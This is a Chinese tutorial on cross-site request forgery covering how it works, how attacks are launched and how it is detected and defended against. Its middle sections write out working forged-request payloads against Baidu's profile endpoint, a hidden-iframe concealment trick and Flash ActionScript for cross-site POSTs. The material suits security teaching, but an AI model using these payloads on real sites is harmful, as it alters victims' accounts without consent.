CSRF——攻擊與防御

author: lake2

0x01 什么是CSRF攻擊

    CSRF是Cross Site Request Forgery的縮寫（也縮寫為XSRF），直譯過(guò)來(lái)就是跨站請(qǐng)求偽造的意思，也就是在用戶會(huì)話下對(duì)某個(gè)CGI做一些GET/POST的事情——這些事情用戶未必知道和愿意做，你可以把它想做HTTP會(huì)話劫持。
    網(wǎng)站是通過(guò)cookie來(lái)識(shí)別用戶的，當(dāng)用戶成功進(jìn)行身份驗(yàn)證之后瀏覽器就會(huì)得到一個(gè)標(biāo)識(shí)其身份的cookie，只要不關(guān)閉瀏覽器或者退出登錄，以后訪問(wèn) 這個(gè)網(wǎng)站會(huì)帶上這個(gè)cookie。如果這期間瀏覽器被人控制著請(qǐng)求了這個(gè)網(wǎng)站的url，可能就會(huì)執(zhí)行一些用戶不想做的功能（比如修改個(gè)人資料）。因?yàn)檫@個(gè) 不是用戶真正想發(fā)出的請(qǐng)求，這就是所謂的請(qǐng)求偽造；呵呵，因?yàn)檫@些請(qǐng)求也是可以從第三方網(wǎng)站提交的，所以前綴跨站二字。
    舉個(gè)簡(jiǎn)單的例子，某個(gè)bbs可以貼圖，在貼圖的URL中寫入退出登陸的鏈接，當(dāng)用戶閱讀這個(gè)帖子之后就會(huì)logout了，因?yàn)橛脩粢宰约旱纳矸菰L問(wèn)了退出 登陸鏈接，在用戶看來(lái)是帖子里面有一張有問(wèn)題的“圖片”，而不是想要退出，但程序就會(huì)認(rèn)為是用戶要求退出登陸而銷毀其會(huì)話。這就是傳說(shuō)中的CSRF攻擊 了。
    不要小看CSRF哦，記得以前L-Blog就存在一個(gè)CSRF漏洞（當(dāng)時(shí)還不知道這個(gè)概念:p），它添加管理員是這樣的一個(gè)鏈接：http: //localhost/L-Blog/admincp.asp?action=member&type=editmem&memID=2& memType=SupAdmin，我們只要構(gòu)造好ID想辦法讓管理員訪問(wèn)到這個(gè)URL就可以了；還有Google那個(gè)CSRF漏洞[1]，將導(dǎo)致郵件泄 漏；另外，不要以為只有XSS才能爆發(fā)蠕蟲(chóng)，只要條件合適，CSRF同樣是有可能的。

0x02 威脅來(lái)自哪里

    貼圖只是GET的方式，很多時(shí)候我們需要偽造POST的請(qǐng)求。一個(gè)辦法是利用跨站，當(dāng)然目標(biāo)站點(diǎn)可能不存在跨站，這個(gè)時(shí)候我們可以從第三方網(wǎng)站發(fā)動(dòng)攻擊。
    比如我要攻擊一個(gè)存在問(wèn)題的blog，那就先去目標(biāo)blog留言，留下一個(gè)網(wǎng)址，誘其主人點(diǎn)擊過(guò)來(lái)（這個(gè)就要看你的忽悠本事咯:p），然后構(gòu)造個(gè)HTML表單提交些數(shù)據(jù)過(guò)去。
    多窗口瀏覽器就幫了一點(diǎn)忙。
    多窗口瀏覽器（firefox、遨游、MyIE……）便捷的同時(shí)也帶來(lái)了一些問(wèn)題，因?yàn)槎啻翱跒g覽器新開(kāi)的窗口是具有當(dāng)前所有會(huì)話的。即我用IE登陸了我 的Blog，然后我想看新聞了，又運(yùn)行一個(gè)IE進(jìn)程，這個(gè)時(shí)候兩個(gè)IE窗口的會(huì)話是彼此獨(dú)立的，從看新聞的IE發(fā)送請(qǐng)求到Blog不會(huì)有我登錄的 cookie；但是多窗口瀏覽器永遠(yuǎn)都只有一個(gè)進(jìn)程，各窗口的會(huì)話是通用的，即看新聞的窗口發(fā)請(qǐng)求到Blog是會(huì)帶上我在blog登錄的cookie。
    想一想，當(dāng)我們用鼠標(biāo)在Blog/BBS/WebMail點(diǎn)擊別人留下的鏈接的時(shí)候，說(shuō)不定一場(chǎng)精心準(zhǔn)備的CSRF攻擊正等著我們。

0x03 發(fā)起CSRF攻擊

    從第三方站點(diǎn)利用POST發(fā)動(dòng)CSRF攻擊就是利用Javascript自動(dòng)提交表單到目標(biāo)CGI。每次都去寫表單不是很方便，輔助進(jìn)行的工具有XSS POST Forwarder[2]和CSRF Redirector[3]，這里我也寫了相應(yīng)的ASP版本[4]。使用的時(shí)候只要把提交的url和參數(shù)傳給它，它就會(huì)自動(dòng)POST到目標(biāo)。
    比如我要提交一些數(shù)據(jù)到www./a.asp：http: //www./lake2/xss_post_forwarder.asp?lake2=http://www./a.asp& a=123&b=321&c=%26%23%25（這里要自己考慮URL編碼哦）
    不過(guò)實(shí)際攻擊的時(shí)候你得動(dòng)動(dòng)腦子：如何才能把用戶誘騙到我們的網(wǎng)頁(yè)來(lái)。

0x04 一個(gè)實(shí)例

    因?yàn)镃SRF不如XSS那么引人注目，所以現(xiàn)在找一個(gè)存在CSRF的Web應(yīng)用程序還是很容易的。這次我們的目標(biāo)是百度，just for test。
    隨便你用什么辦法，讓一個(gè)已登陸百度的用戶訪問(wèn)一下這個(gè)URL：http: //www./lake2/xss_post_forwarder.asp?lake2=http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B
    呵呵，然后看看那人個(gè)人資料是不是被修改了。這里有點(diǎn)郁悶，當(dāng)那人訪問(wèn)URL后瀏覽器會(huì)返回到資料修改成功的頁(yè)面，我們就被發(fā)現(xiàn)了。那么，有沒(méi)有辦法不讓瀏覽器刷新呢？
    有。
    一個(gè)辦法是用iframe，構(gòu)造這樣的HTML代碼：<iframe width=0 height=0 src="http://www./lake2/xss_post_forwarder.asp?lake2=http://passport.baidu.com/ucommitbas&u_jump_url=&sex=1&email=CSRF@baidu.com&sdv=&zodiac=0&birth_year=0&birth_month=0&birth_day=0&blood=0&bs0=%C7%EB%D1%A1%D4%F1&bs1=%C7%EB%D1%A1%D4%F1&bs2=%CE%DE&txt_bs=&birth_site=%3B%3B&b%3Drs0=%C7%EB%D1%A1%D4%F1&rs1=%C7%EB%D1%A1%D4%F1&rs2=%CE%DE&txt_rs=&reside_site=%3B%3B"></iframe>
    還有一個(gè)辦法就是用flash了。

0x05 CSRF With Flash

    flash是可以提交數(shù)據(jù)到任意URL的，打開(kāi)盜版的 Adobe flash CS 3 Professional，新建一個(gè) flash文件(ActionScript 3.0) ，在默認(rèn)的圖層上點(diǎn)右鍵選動(dòng)作，然后把以下代碼添加進(jìn)去：
：

       import flash.net.URLRequest;
       import flash.system.Security;
       var url = new URLRequest("http://www./lake2");
       var lake = new URLVariables();
       lake = "a=lake2";
       url.method = "POST";
       url.data = lake;
       sendToURL(url);
       stop();

    導(dǎo)出為swf文件，訪問(wèn)之，抓包看看效果咯：http://www./lake2/flash/test1.html
    每次都去寫as和編譯swf很麻煩的，根據(jù)CSRF Redirector的思路我寫了一個(gè)類似的flash程序[5]，再拿百度來(lái)試試效果，訪問(wèn)帶如下HTML的網(wǎng)頁(yè)：<EMBED src="http://www./lake2/flash/flash_hacking.swf?f=1&t=http://passport.baidu.com/ucommitbas& d=u_jump_url%3D%26sex%3D1%26email%3DCSRF@baidu.com%26sdv%3D%26zodiac%3D0% 26birth_year%3D0%26birth_month%3D0%26birth_day%3D0%26blood%3D0%26bs0%3D%25C7% 25EB%25D1%25A1%25D4%25F1%26bs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26bs2%3D% 25CE%25DE%26txt_bs%3D%26birth_site%3D%253B%253B%26b%253Drs0%3D%25C7%25EB% 25D1%25A1%25D4%25F1%26rs1%3D%25C7%25EB%25D1%25A1%25D4%25F1%26rs2%3D%25CE% 25DE%26txt_rs%3D%26reside_site%3D%253B%253B"></EMBED>（還是要注意URL二 次編碼）
    這里不要只局限于發(fā)請(qǐng)求，其實(shí)flash是可以得到返回內(nèi)容的，要是返回內(nèi)容有敏感信息的話，就可以讀出來(lái)發(fā)送到我們控制的Web去。當(dāng)然，這個(gè)得看目標(biāo)站點(diǎn)是否讓flash跨域取內(nèi)容了。

0x06 檢測(cè)CSRF

    檢測(cè)CSRF漏洞都是體力活了，先抓取一個(gè)正常請(qǐng)求的數(shù)據(jù)包，然后去掉referer字段再重新提交，如果還是有效那基本上就存在問(wèn)題了。當(dāng)然參數(shù)可能含 有不能預(yù)測(cè)的參數(shù)（比如userid什么的），這個(gè)時(shí)候就看這個(gè)不可預(yù)測(cè)的參數(shù)能不能通過(guò)其他手段比如flash拿到，如果能，呵呵，則還是存在問(wèn)題。還 有就是試著改post為get，因?yàn)橛行┏绦蚴遣粎^(qū)分get/post的。
    應(yīng)用程序的功能和返回形式都各不相同，所以想自動(dòng)化測(cè)試CSRF漏洞還是有點(diǎn)困難的，OWASP上面有一個(gè)叫做CSRFTester的工具不妨拿來(lái)一試[6]

0x07 防御CSRF

    在Web應(yīng)用程序側(cè)防御CSRF漏洞，一般都是利用referer、token或者驗(yàn)證碼，Nexus的文章[7]已經(jīng)寫的很全面了；superhei也有提出bypass的思路[8]，請(qǐng)參考他們的文章。
    還有一個(gè)思路是在客戶端防御，貌似可以做成一個(gè)類似HTTP Watch的軟件，掛在瀏覽器上攔截或者過(guò)濾跨域的cookie。

0x08 總結(jié)

    希望本文對(duì)您有幫助，同時(shí)也歡迎各位同我交流：lake2@mail.csdn.net

[ Reference ]

[1] Google GMail E-mail Hijack Technique, http://www./blog/google-gmail-e-mail-hijack-technique/
[2] XSS POST Forwarder, http:///misc/xss_post_forwarder.php
[3] CSRF Redirector, http:///blog/2007/jul/csrf-redirector
[4] ASP的XSS POST Forwarder下載(附送一個(gè)HTML版), http://www./lake2/xss_post_forwarder.zip
[5] 源代碼和編譯好的swf文件下載：http://www./lake2/flash/flash_hacking.rar
[6] CSRFTester, http://www./index.php/Category:OWASP_CSRFTester_Project
[7] Preventing CSRF, http://www./view.php?id=31. 漢化版, http://www./archives/security/preventing-csrf
[8] Bypass Preventing CSRF, http://www./articles/200801/964.html